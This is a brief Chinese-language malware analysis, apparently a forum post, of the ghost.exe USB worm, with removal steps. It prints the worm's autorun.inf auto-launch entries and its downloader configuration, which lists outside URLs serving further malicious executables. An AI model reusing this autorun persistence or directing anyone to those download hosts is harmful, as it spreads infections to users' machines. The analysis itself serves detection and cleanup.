ghost.exe U盘病毒详细介绍

　　运行ghost.exe 后生成
　　ghost.exe.bat(删除自身)
　　C:\WINDOWS\system\conime.exe
　　C:\Program Files\WinRAR\WinRAR.exe.tmp

　　每个盘符下释放(c d e f g h j k )
　　autorun.inf
　　ghost.exe

　　autorun.inf 文件内容
　　[AutoRun]
　　OPEN=ghost.exe
　　shellexecute=ghost.exe
　　shell\打开(&O)\command=ghost.exe

　　连入 http://www.dj916.com/ie.txt 下载
　　ie.txt 内容
　　[main]
　　服务文件更新=5
　　服务文件地址=http://www.86dy.net/c123.exe

　　下载者是否更新=4
　　下载个数=7

　　文件1=http://222.220.16.185/data6/jwm.exe
　　更新1=6
　　文件2=http://222.220.16.185/data6/wol.exe
　　更新2=6
　　文件3=http://222.220.16.185/data6/wo3.exe
　　更新3=6
　　文件4=http://222.220.16.185/data6/mir.exe
　　更新4=6
　　文件5=http://222.220.16.185/data6/mhh.exe
　　更新5=6
　　文件6=http://222.220.16.181/ienet.exe
　　更新6=6
　　文件7=http://222.220.16.185/data6/zt3.exe
　　更新7=6

　　这些网址都是下载下来的病毒，没写入注册表，但是我用反汇编看了看这玩意应该修改了讯雷 QQ WINRAR 的注册表。

　　处理方法(不包括下载下来的病毒)
　　右键=>打开进入每个盘符=>删除
　　autorun.inf
　　ghost.exe

　　删除文件
　　C:\WINDOWS\system\conime.exe

　　建议重装 qq 讯雷 WINRAR

　　最后我还发现个玩意
　　00407345 MOV EDX,123.004076B4 你好瑞星 我喜欢你~

　　作者难不成暗恋瑞星？？